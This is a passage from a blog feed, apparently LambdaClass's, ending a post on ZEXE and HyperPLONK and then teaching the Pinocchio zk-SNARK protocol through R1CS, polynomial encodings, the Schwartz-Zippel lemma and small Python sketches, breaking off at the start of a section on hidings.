&lt;p&gt;VERI-ZEXE uses PLONK with lookup tables, resulting in fewer constraints and shorter proving times. Two weeks ago, HyperPLONK came out, providing a linear-time prover and high-degree custom gates. One of the key changes is the shift from univariate polynomials (polynomials in one variable, \(x \), such as \(a_0+a_1x+a_2x^2+\dots+a_dx^d \)) to multilinear polynomials (polynomials in several variables, where the degree of each \( x_k \) is at most one, such as \( a_0 +a_1x_1+a_2x_2+a_{12}x_1x_2+a_{145}x_1x_4x_5 \)). This change avoids using the fast Fourier transform (FFT) for very large systems (with over \(2^{20} \) constraints), which has a superlinear cost (roughly speaking, the FFT for \( n \) points needs \( n\log(n) \) operations). Preliminary studies have shown that this new PLONK version performs better for circuits with more than 16000 constraints compared to optimized versions of the original proposal. We will cover this topic in an upcoming post.&lt;&#x2F;p&gt;
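&lt;p&gt;To make the multilinear shape concrete, here is a small sketch of ours (unrelated to the HyperPLONK implementation): since each variable has degree at most one, a multilinear polynomial is determined by one coefficient per subset of variables, and evaluation is a single pass over those subsets.&lt;&#x2F;p&gt;

```python
# A multilinear polynomial is stored as a dict mapping a tuple of
# variable indices (a subset of variables) to its coefficient.
# Variable names and values below are illustrative.

def eval_multilinear(coeffs, point):
    total = 0
    for variables, a in coeffs.items():
        term = a
        for k in variables:
            term = term * point[k]    # each x_k appears at most once
        total = total + term
    return total

# a_0 + a_1 x_1 + a_2 x_2 + a_12 x_1 x_2, in the spirit of the
# example in the text
poly = {(): 1, (1,): 2, (2,): 3, (1, 2): 4}
value = eval_multilinear(poly, {1: 2, 2: 3})   # 1 + 4 + 9 + 24 = 38
```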
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;ZK proofs are the key to many new applications, such as decentralized finance, governance, etc. The ZEXE protocol introduced the concept of decentralized private computation, allowing users to run private applications over public ledgers. The original proposal was based on non-universal proving systems, which have efficient performance but require a new trusted setup for each program we want to run. Since then, several significant improvements in proving systems (such as Marlin and PLONK) and new “SNARK-friendly” cryptographic primitives (such as symmetric ciphers and hash functions) have been introduced, resulting in increased performance and lower computational costs. These changes allow less powerful devices to act as provers and run more complex programs.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Pinocchio Virtual Machine: Nearly Practical Verifiable Computation</title>
          <pubDate>Fri, 13 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/pinocchio-virtual-machine-nearly-practical-verifiable-computation/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/pinocchio-virtual-machine-nearly-practical-verifiable-computation/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/pinocchio-virtual-machine-nearly-practical-verifiable-computation/">&lt;p&gt;At &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lambdaclass.com&#x2F;&quot;&gt;LambdaClass&lt;&#x2F;a&gt; we set up a small research team to work on Zero Knowledge Proofs and Fully Homomorphic Encryption, who in the past few weeks implemented a virtual machine implementing the Pinocchio protocol in Rust.&lt;&#x2F;p&gt;
&lt;p&gt;You can check out the repository at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;pinocchio_lambda_vm&quot;&gt;lambdaclass&#x2F;pinocchio_lambda_vm&lt;&#x2F;a&gt;. It was built by Mauro Toscano, Sergio Chouhy, Agustin Garassino and Diego Kingston.&lt;&#x2F;p&gt;
&lt;p&gt;If you’re in need of a team of engineers and researchers who’ve been working together for a decade in areas like distributed systems, machine learning, compilers, and cryptography, we’re your guys. Wanna chat more about it? Book a meeting with us through &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;calendly.com&#x2F;federicocarrone&quot;&gt;calendly&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;zk-SNARK protocols can be hard to understand for newcomers. One of the first practical implementations is called Pinocchio, and it’s a very good starting point for anyone trying to get their head around them. Pinocchio’s paper can be found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2013&#x2F;279.pdf&quot;&gt;here&lt;&#x2F;a&gt;. Having a thorough understanding of its main ideas is of great value to be able to get through the newer and more sophisticated protocols.&lt;&#x2F;p&gt;
&lt;p&gt;In this post we discuss the intuition behind its inner workings and the way it is able to provide succinct proofs of circuit executions.&lt;&#x2F;p&gt;
&lt;p&gt;We know that sometimes math seems more complicated and scary than it actually is. And, very often, being able to take a look at some actual code sheds light on what’s happening. So we created a companion for this blogpost: a zero-dependency rust implementation of Pinocchio for learning purposes. You can find it at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;pinocchio_lambda_vm&quot;&gt;lambdaclass&#x2F;pinocchio_lambda_vm&lt;&#x2F;a&gt;. We encourage you to go there if you are searching for details not covered here.&lt;&#x2F;p&gt;
&lt;p&gt;So, let’s get started!&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-problem-to-solve&quot;&gt;The problem to solve&lt;&#x2F;h2&gt;
&lt;p&gt;The problem Pinocchio tries to solve is the following: someone runs some code with a number of input values. She gets the final result of the program and wants to convince others that this value is actually the output of the execution of that program for the given inputs.&lt;&#x2F;p&gt;
&lt;p&gt;The starting point of this is a process where the program of interest is translated to “arithmetic circuits”. In the context of Pinocchio, these are directed graphs whose nodes represent arithmetic operations. We’ll now see this with an example.&lt;&#x2F;p&gt;
&lt;p&gt;By the way, we are not discussing here how to convert the programs to circuits. Our context is the following: someone called a “prover” wants to convince others, the “verifiers”, that she executed an arithmetic circuit and got some output values out of it. Let’s see what this all means.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;circuit-execution&quot;&gt;Circuit execution&lt;&#x2F;h2&gt;
&lt;p&gt;Throughout this post, let’s consider a variant of the example circuit from the paper as a running example. The circuit is the following:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2023&#x2F;01&#x2F;imagen.png&quot; alt=&quot;imagen&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The little squares on the top represent the input values. Choosing input values determines the output values of all the other gates. Executing the circuit means choosing some values for the input gates and filling out the rest of the values corresponding to the output of the multiplication gates. If you are wondering why we are only labeling the output of the multiplication gates, that’s normal. The answer is: it’s enough to do it this way. We’ll come back to this in a moment.&lt;&#x2F;p&gt;
&lt;p&gt;For example, suppose we are working in $\mathbb F_{p}$, for some large prime $p$. The following are two evaluations of the circuit.&lt;&#x2F;p&gt;
&lt;p&gt;Here the input values are $2$ and $3$. The output is $30$. The unique intermediate value is $6$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2023&#x2F;01&#x2F;imagen-2.png&quot; alt=&quot;imagen-2&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Another evaluation is the following: the input values are $6$ and $4$, the output value is $240$, and the intermediate value is $24$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2023&#x2F;01&#x2F;imagen-3.png&quot; alt=&quot;imagen-3&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;equations-that-satisfy-circuit-execution-instances&quot;&gt;Equations that satisfy circuit execution instances&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s name the input values $c_1, c_2$, the output value $c_3$, and the intermediate one $c_4$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2023&#x2F;01&#x2F;imagen-5.png&quot; alt=&quot;imagen-5&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Here is a simple but important observation. It doesn’t matter which input values we choose, the resulting values will satisfy the following system of equations:&lt;br &#x2F;&gt;
$c_1c_2 = c_4$&lt;br &#x2F;&gt;
$(c_1+c_2)c_4 = c_3$&lt;br &#x2F;&gt;
Here we have one equation for every multiplication gate. Since we are not labeling the output of the addition gates, we expand them in the left and right operands of the multiplication gate. In this example, that happens only in the left operand of the second equation.&lt;br &#x2F;&gt;
Every set of values $c_1,c_2,c_3,c_4$ that satisfies those two equalities corresponds to an execution instance of the program: these are exactly the values produced by executing the program with input values $c_1$ and $c_2$.&lt;br &#x2F;&gt;
These equations test whether a set of values $c_1,c_2,c_3,c_4$ correspond to an execution instance.&lt;&#x2F;p&gt;
&lt;p&gt;We could have named $c_5$ the output of the addition gate and have the following larger system of equations.&lt;br &#x2F;&gt;
$c_1c_2 = c_4$&lt;br &#x2F;&gt;
$c_1+c_2 = c_5$&lt;br &#x2F;&gt;
$c_5c_4 = c_3$&lt;br &#x2F;&gt;
But it is unnecessary. And not doing so has the advantage that every equation in the resulting system of equations has the form&lt;br &#x2F;&gt;
$$(c_{i_1} + \cdots + c_{i_\alpha})(c_{j_1} + \cdots + c_{j_\beta}) = c_k$$&lt;br &#x2F;&gt;
Note that the second equation in the last system is not of this form. Having all equations of the same shape will be very convenient for the protocol. Moreover, having all the equations of that specific form will be very important, as we’ll later see. And we achieve this simply by giving variable names to the input and output values of the multiplication gates, but not addition gates. A system of equations of this form is called a Rank-1 Constraint System (R1CS).&lt;&#x2F;p&gt;
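&lt;p&gt;Checking whether a tuple satisfies this R1CS is cheap and mechanical. Here is a minimal sketch of ours for the example circuit (the prime $p$ is an illustrative choice of field):&lt;&#x2F;p&gt;

```python
# R1CS check for the example circuit: one constraint per
# multiplication gate, each of the form (sum)(sum) = c_k.
# The prime P is an illustrative choice of field size.

P = 2 ** 31 - 1

def satisfies_r1cs(c1, c2, c3, c4, p=P):
    eq1 = (c1 * c2 - c4) % p == 0           # c1 * c2 = c4
    eq2 = ((c1 + c2) * c4 - c3) % p == 0    # (c1 + c2) * c4 = c3
    return eq1 and eq2
```

&lt;p&gt;The two evaluations shown earlier, $(2, 3, 30, 6)$ and $(6, 4, 240, 24)$, satisfy both constraints, while an arbitrary tuple such as $(1, 1, 0, 0)$ does not.&lt;&#x2F;p&gt;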
&lt;h4 id=&quot;recap&quot;&gt;Recap&lt;&#x2F;h4&gt;
&lt;p&gt;So, we started from a circuit. By choosing some input values and tracking the output values of every multiplication gate, we obtain a tuple of values $(c_1,\dots,c_N)$ that satisfy a system of equations of a specific form, called R1CS. Moreover, any solution to that system of equations corresponds to some execution of the circuit.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;naive-proof-of-execution&quot;&gt;Naive proof of execution&lt;&#x2F;h2&gt;
&lt;p&gt;In our example, if we would like to prove that we executed the circuit, we could show the values we got $c_1,c_2,c_3,c_4$. A verifier could then check that the equations hold and be sure that we executed the circuit with input values $c_1$ and $c_2$, and we got $c_3$ as a result. The problem with this is evident: the verification work is the same as executing the circuit. This is useless since we want to delegate heavy computations to untrusted servers and then have concise proof of the execution. So redoing all the work is off the table.&lt;&#x2F;p&gt;
&lt;p&gt;The idea of QAP and Pinocchio is expressing the system of equations in a more compact form as a single polynomial identity. This, together with some fundamental algebra results, will allow us to give a succinct proof of the execution. The amount of work that the verifier will have to do is always the same, regardless of the complexity of the circuit.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;pinocchio-s-idea-of-proof-of-execution&quot;&gt;Pinocchio’s idea of proof of execution&lt;&#x2F;h2&gt;
&lt;p&gt;As we will see shortly, there is a very particular and circuit-dependent way of constructing a polynomial $p$ out of the values $c_1, c_2, c_3, c_4$ that encodes correct executions. This means that $c_1,c_2,c_3,c_4$ are valid execution instance values if and only if their associated polynomial $p$ satisfies a special property. For the circuit of the example, this property is $p$ being equal to $X(X-1)h$ for some polynomial $h$. We’ll see shortly where this property comes from. So, the protocol’s idea is that the prover constructs the polynomial $p$ and convinces the verifier that there exists $h$ such that $p=X(X-1)h$.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol will be something like this.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. In a setup phase a random point $s$ in $\mathbb F_p$ is chosen and the value $s(s-1)$ is precomputed.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The prover executes the circuit with public input values $c_1$ and $c_2$ and obtains $c_3,c_4$. She constructs the polynomial $p$ out of these values and computes $h$ such that $p = X(X-1)h$. She evaluates $a = p(s)$ and $b = h(s)$ and sends $a$ and $b$ to the verifier.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The verifier checks that $a = s(s-1)b$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
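&lt;p&gt;The steps above can be simulated in a few lines. This toy sketch of ours is still insecure, as the questions below show; it uses the first execution instance, for which (as computed later in the post) $p = 9X(X-1)$ and hence $h = 9$, over an illustrative prime field.&lt;&#x2F;p&gt;

```python
import random

# Toy run of the three-step sketch: the prover knows p = 9 X (X - 1),
# so h = p / (X (X - 1)) is the constant 9. The prime P is an
# illustrative stand-in for a large field.

P = 2 ** 61 - 1

def setup():
    s = random.randrange(P)        # random evaluation point
    t = s * (s - 1) % P            # precomputed s(s - 1)
    return s, t

def prove(s):
    a = 9 * s * (s - 1) % P        # a = p(s)
    b = 9                          # b = h(s), h is the constant 9
    return a, b

def verify(t, a, b):
    return a == t * b % P          # check a = s(s - 1) b

s, t = setup()
a, b = prove(s)
assert verify(t, a, b)
```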
&lt;p&gt;We will have to address many disturbing things for this to work. For example:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. How is $p$ constructed?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Why is it enough to check that $a = s(s-1)b$ to be convinced that $p = X(X-1)h$?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. How does the verifier know that the prover followed the correct recipe to construct $p$ from the values of the circuit&amp;#39;s execution?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. How does the verifier know that $a$ and $b$ are values that come from evaluating polynomials $p$ and $h$ at $s$?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. How does the verifier know which public input values were used to execute the circuit?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. What&amp;#39;s stopping the prover from simply choosing $b=1$ and $a = s(s-1)$?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. How is this ever going to work?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To address all these questions, the protocol gets more convoluted. But the essence of it is the steps above. The rest comes into play to guarantee that no one is cheating. We’ll cover all of these questions, and in the end, we’ll obtain the actual Pinocchio protocol.&lt;&#x2F;p&gt;
&lt;p&gt;For more complex circuits, more complex polynomials $p$ are involved, and the condition $p = X(X-1)h$ is replaced with $p = X(X-1)(X-2)\cdots(X-k)h$ for a number $k$ that depends on the number of multiplication gates of the circuit. The idea is still the same. More importantly, the number of checks the verifier has to perform is independent of the circuit!&lt;&#x2F;p&gt;
&lt;h2 id=&quot;1-polynomials-to-express-correct-circuit-executions&quot;&gt;1. Polynomials to express correct circuit executions&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s start by showing how we construct the polynomial $p$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;from-families-of-polynomials-to-systems-of-equations&quot;&gt;From families of polynomials to systems of equations&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s forget about our examples and circuits and start by playing around with random polynomials. Let’s take the $v_i$ as&lt;br &#x2F;&gt;
$$v_1 = X, v_2 = X + 1, v_3 = X + 2$$&lt;&#x2F;p&gt;
&lt;p&gt;the $w_i$ as&lt;br &#x2F;&gt;
$$w_1 = 2X + 1, w_2 = 2X + 2, w_3 = 2X + 3$$&lt;&#x2F;p&gt;
&lt;p&gt;and the $y_i$ as&lt;br &#x2F;&gt;
$$y_1 = X, y_2 = -X + 1, y_3 = 0$$&lt;&#x2F;p&gt;
&lt;p&gt;Let $c_1,c_2,c_3$ be three elements of $\mathbb F_p$. Out of them, construct the following polynomial&lt;br &#x2F;&gt;
$$p = (c_1v_1 + c_2v_2 + c_3v_3)(c_1w_1 + c_2w_2 + c_3w_3) - (c_1y_1 + c_2y_2 + c_3y_3)$$&lt;br &#x2F;&gt;
We could ask ourselves the following (seemingly unrelated to anything) question: which values $c_1, c_2, c_3$ are such that $p$ has roots at $0$ and $1$? To figure it out, we can evaluate at $0$ and $1$. Precisely, $p(0) = 0$ and $p(1) = 0$ mean&lt;&#x2F;p&gt;
&lt;p&gt;$0 = p(0) = (c_2+2c_3)(c_1 + 2c_2 + 3c_3) - c_2$&lt;br &#x2F;&gt;
$0 = p(1) = (c_1 + 2c_2 + 3c_3)(3c_1 + 4c_2 + 5c_3) - c_1$&lt;&#x2F;p&gt;
&lt;p&gt;$c_1,c_2$, and $c_3$ are such that the polynomial $p$ satisfies $p(0) = 0$ and $p(1) = 0$ if and only if they solve the following system of equations&lt;&#x2F;p&gt;
&lt;p&gt;$(c_2+2c_3)(c_1 + 2c_2 + 3c_3) = c_2$&lt;br &#x2F;&gt;
$(c_1 + 2c_2 + 3c_3)(3c_1 + 4c_2 + 5c_3) = c_1$&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, the basic theory of polynomials says that $0$ and $1$ are roots of a polynomial $p$ if and only if $X(X-1)$ divides $p$. That is, if and only if there exists a polynomial $h$ such that&lt;br &#x2F;&gt;
$$p = X(X-1)h$$&lt;&#x2F;p&gt;
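&lt;p&gt;These evaluations are easy to double-check numerically. In this quick sketch of ours, with arbitrary values for $c_1, c_2, c_3$, note that $p(1)$ subtracts $c_1$, since $y_1$ is the only one of the $y$ polynomials that is nonzero at $1$:&lt;&#x2F;p&gt;

```python
# Evaluate p for the toy families v_i, w_i, y_i above and compare
# against the two equations obtained by hand. Any values of
# c1, c2, c3 work; the ones below are arbitrary.

def p_toy(x, c1, c2, c3):
    v = c1 * x + c2 * (x + 1) + c3 * (x + 2)                    # v_i at x
    w = c1 * (2 * x + 1) + c2 * (2 * x + 2) + c3 * (2 * x + 3)  # w_i at x
    y = c1 * x + c2 * (1 - x)                                   # y_3 = 0
    return v * w - y

c1, c2, c3 = 5, 7, 11
assert p_toy(0, c1, c2, c3) == (c2 + 2 * c3) * (c1 + 2 * c2 + 3 * c3) - c2
assert p_toy(1, c1, c2, c3) == (c1 + 2 * c2 + 3 * c3) * (3 * c1 + 4 * c2 + 5 * c3) - c1
```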
&lt;h4 id=&quot;takeaway&quot;&gt;Takeaway&lt;&#x2F;h4&gt;
&lt;p&gt;Wrapping up, we started from sets of polynomials $v_i, w_i, y_i$. These give a way to construct a polynomial $p$ out of any tuple $c_1,c_2,c_3$. The polynomial $p$ is divisible by $X(X-1)$ if and only if the values $c_1,c_2,c_3$ satisfy a system of equations.&lt;&#x2F;p&gt;
&lt;p&gt;This way of encoding systems of equations in a single polynomial identity is the fundamental trick to constructing succinct proofs.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;going-back-to-our-circuit&quot;&gt;Going back to our circuit&lt;&#x2F;h3&gt;
&lt;p&gt;In the previous section, we chose random polynomials. Therefore we got associated with them a system of equations that has nothing to do with our circuit. What we are going to do now is to carefully choose polynomials $v_i, w_i, y_i$, such that the system of equations associated with them is the R1CS of our circuit:&lt;&#x2F;p&gt;
&lt;p&gt;$c_1c_2 = c_4$&lt;br &#x2F;&gt;
$(c_1+c_2)c_4 = c_3$&lt;&#x2F;p&gt;
&lt;p&gt;Since we have four variables $c_1,c_2,c_3$, and $c_4$, we need four polynomials in each family. In other blogposts we will explain how to construct them using polynomial interpolation, but for now, here are the polynomials we want:&lt;&#x2F;p&gt;
&lt;p&gt;$v_1 = 1, v_2 = X, v_3 = 0, v_4 = 0$&lt;br &#x2F;&gt;
$w_1 = 0, w_2 = -X + 1, w_3 = 0, w_4 = X$&lt;br &#x2F;&gt;
$y_1 = 0, y_2 = 0, y_3 = X, y_4 = -X + 1$&lt;&#x2F;p&gt;
&lt;p&gt;And for every $(c_1,c_2,c_3,c_4)$ we construct $p$ following this recipe:&lt;&#x2F;p&gt;
&lt;p&gt;$p = (c_1v_1 + c_2v_2 + c_3v_3 + c_4v_4)(c_1w_1 + c_2w_2 + c_3w_3 + c_4w_4) - (c_1y_1 + c_2y_2 + c_3y_3 + c_4y_4)$&lt;br &#x2F;&gt;
$= (c_1 + c_2X)(c_2(-X+1) + c_4X) - (c_3X + c_4(-X + 1))$&lt;&#x2F;p&gt;
&lt;p&gt;We have $p(0) = c_1c_2 - c_4$ and $p(1) = (c_1+c_2)c_4 - c_3$. So $p$ is divisible by $X(X-1)$ if and only if&lt;&#x2F;p&gt;
&lt;p&gt;$c_1c_2 = c_4$&lt;br &#x2F;&gt;
$(c_1+c_2)c_4 = c_3$&lt;&#x2F;p&gt;
&lt;p&gt;Let’s plug in some actual values and see what $p$ looks like. Let’s start with the tuples of our execution examples. For our first example, we have $(c_1,c_2,c_3,c_4) = (2, 3, 30, 6)$. We get&lt;&#x2F;p&gt;
&lt;p&gt;$p = (2 + 3X)(3(-X+1) + 6X) - (30X + 6(-X+1))$&lt;br &#x2F;&gt;
$ = (2 + 3X)(3X + 3) - (24X + 6)$&lt;br &#x2F;&gt;
$ = 6X + 6 + 9X^2 + 9X - 24X - 6$&lt;br &#x2F;&gt;
$ = 9X^2 -9X$&lt;br &#x2F;&gt;
$ = 9X(X-1)$&lt;&#x2F;p&gt;
&lt;p&gt;For our second example, $(c_1,c_2,c_3,c_4) = (6, 4, 240, 24)$. We obtain&lt;&#x2F;p&gt;
&lt;p&gt;$p = (6 + 4X)(4(-X+1) + 24X) - (240X + 24(-X+1))$&lt;br &#x2F;&gt;
$ = (6 + 4X)(20X + 4) - (216X + 24)$&lt;br &#x2F;&gt;
$ = 120X + 24 + 80X^2 + 16X - 216X - 24$&lt;br &#x2F;&gt;
$ = 80X^2-80X$&lt;br &#x2F;&gt;
$ = 80X(X-1)$&lt;&#x2F;p&gt;
&lt;p&gt;So in both cases $p(0)=0, p(1)=0$, and consequently $p$ is divisible by $X(X-1)$.&lt;&#x2F;p&gt;
&lt;p&gt;Let us see what happens when we choose $(c_1, c_2, c_3, c_4)$ that do not correspond to an execution instance. For example, consider the polynomial $p$ associated with $c_1=1, c_2=1, c_3=0, c_4=0$. These values do not conform to an execution instance of the circuit. We get&lt;&#x2F;p&gt;
&lt;p&gt;$p = (1 + X)((-X+1) + 0X) - (0X + 0(-X+1))$&lt;br &#x2F;&gt;
$= (1 + X)(-X + 1)$&lt;&#x2F;p&gt;
&lt;p&gt;and this polynomial satisfies $p(0) = 1$, so it’s not divisible by $X(X-1)$.&lt;&#x2F;p&gt;
&lt;p&gt;Families of polynomials $v_i, w_i, y_i$ that encode circuit execution instances like this exist for any circuit.&lt;&#x2F;p&gt;
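&lt;p&gt;The three checks above can be reproduced numerically with a sketch of ours that evaluates $p$ using the families $v_i, w_i, y_i$ of the example circuit:&lt;&#x2F;p&gt;

```python
# Evaluate p = (sum c_i v_i)(sum c_i w_i) - (sum c_i y_i) at x, using
# the polynomial families of the example circuit. A tuple is a valid
# execution instance exactly when p(0) = p(1) = 0.

def p_at(x, c1, c2, c3, c4):
    v = c1 * 1 + c2 * x          # v1 = 1, v2 = X, v3 = v4 = 0
    w = c2 * (1 - x) + c4 * x    # w2 = -X + 1, w4 = X
    y = c3 * x + c4 * (1 - x)    # y3 = X, y4 = -X + 1
    return v * w - y

# The valid instances (2, 3, 30, 6) and (6, 4, 240, 24) vanish at
# both 0 and 1; the invalid tuple (1, 1, 0, 0) does not.
```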
&lt;h3 id=&quot;recap-1&quot;&gt;Recap&lt;&#x2F;h3&gt;
&lt;p&gt;The main goal is to prove the correct execution of a circuit. Showing the values we got $c_1,\dots,c_N$ is not great because the verifier has to do a lot of work to validate them. Polynomials enter here to give an alternative way of showing that information. Out of the values $c_1,\dots,c_N$ we can construct a polynomial $p$. That polynomial has a special property when the values $c_i$ correspond to a valid execution of the circuit. In our example that property is $p$ being divisible by $X(X-1)$. So this gives another way to prove correct executions:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Show that we properly constructed $p$ following the recipe for the circuit in question.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Show that $p = X(X-1)h$ for some polynomial $h$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;2-schwartz-zippel-lemma&quot;&gt;2. Schwartz-Zippel lemma&lt;&#x2F;h2&gt;
&lt;p&gt;A naive way of showing that $p = X(X-1)h$ would be to give the coefficients of $p$ to the verifier and let him divide it by $X(X-1)$ to find that such a polynomial $h$ exists. This isn’t good since the amount of work required to do that division scales with the complexity of the circuit. There is a very cheap alternative that appears in every SNARK: show that the equality $p(s) = s(s-1)h(s)$ holds for some random element $s$ in $\mathbb F_p$. The Schwartz-Zippel lemma states that this is enough to be convinced that $p = X(X-1)h$ with high probability. Let’s see why.&lt;&#x2F;p&gt;
&lt;p&gt;The key concept here is that of a &lt;em&gt;root&lt;&#x2F;em&gt; of a polynomial. A root of a polynomial $f$ is an element $r \in \mathbb F_p$ such that $f(r)=0$. A fundamental algebra theorem states that a non-zero polynomial of degree $d$ can have, at most, $d$ roots. For example, the polynomial $f = X^5 -3X + 8$ has at most $5$ roots. So if $\mathbb F_p$ has a vast number of elements and we choose a random $s$ in it, the chance of it being one of the $5$ roots of that polynomial is meager. On the other hand, the polynomial $f=0$ is the only one that satisfies $f(s)=0$ for all $s$.&lt;&#x2F;p&gt;
&lt;p&gt;Putting this all together, if $f$ is a polynomial and $f(s)=0$ for a random $s$, then with high probability, we can be sure that $f=0$.&lt;&#x2F;p&gt;
&lt;p&gt;In our case, we have $p$ and $h$ and want to convince a verifier that $p = X(X-1)h$. In other words, we have the polynomial $f = p - X(X-1)h$ and we want to convince the verifier that $f=0$. So using this approach, it’s enough to show that $0 = f(s) = p(s) - s(s-1)h(s)$ for a random $s$. This is the same as showing that $p(s) = s(s-1)h(s)$ for a random $s$.&lt;&#x2F;p&gt;
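&lt;p&gt;A minimal sketch of this randomized check, using the $p$ and $h$ of the running example; the prime modulus below is illustrative, not part of the protocol.&lt;&#x2F;p&gt;

```python
import random

P = 10**9 + 7  # an illustrative prime, standing in for the field F_p

def eval_poly(coeffs, x):
    # Horner evaluation mod P; coefficients listed from low to high degree.
    acc = 0
    for a in reversed(coeffs):
        acc = (acc * x + a) % P
    return acc

# From the example: p = 80X^2 - 80X = X(X-1)h with h = 80.
p = [0, -80, 80]
h = [80]

s = random.randrange(P)  # the random evaluation point
lhs = eval_poly(p, s)
rhs = s * (s - 1) % P * eval_poly(h, s) % P
print(lhs == rhs)  # True: strong evidence that p = X(X-1)h
```

&lt;p&gt;If $p$ were &lt;em&gt;not&lt;&#x2F;em&gt; divisible by $X(X-1)$, the difference $p - X(X-1)h$ would be a non-zero polynomial of tiny degree, so a random $s$ would expose the lie with overwhelming probability.&lt;&#x2F;p&gt;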
&lt;h2 id=&quot;3-hidings&quot;&gt;3. Hidings&lt;&#x2F;h2&gt;
&lt;p&gt;So far things look a bit silly because we are working with raw elements in $\mathbb F_p$. If the prover sends the verifier $p(s)$ and $h(s)$, she sends two elements of $\mathbb F_p$. So the verifier receives two elements $a, b$ in $\mathbb F_p$ and has no idea how they were produced. Are they random? Are they actually $p(s)$ and $h(s)$? There’s no way to tell.&lt;&#x2F;p&gt;
&lt;p&gt;The solution is to work with obfuscated data that allows parties to do a minimal set of operations. The way to obfuscate is pretty simple. We will have a group $G$ and a way to associate to every element of $\mathbb F_p$ its element in $G$ in a way that’s hard to invert.&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb F_p \longrightarrow G$$&lt;&#x2F;p&gt;
&lt;h4 id=&quot;example&quot;&gt;Example&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s give an example. The number $113$ is prime, and here is a fact we’ll use: in $\mathbb Z_{454}$ the element $3$ has the property that $3^{x} \equiv 1$ modulo $454$ if and only if $x \equiv 0$ modulo $113$. This implies that $3^i \equiv 3^j$ modulo $454$ if and only if $i \equiv j$ modulo $113$.&lt;&#x2F;p&gt;
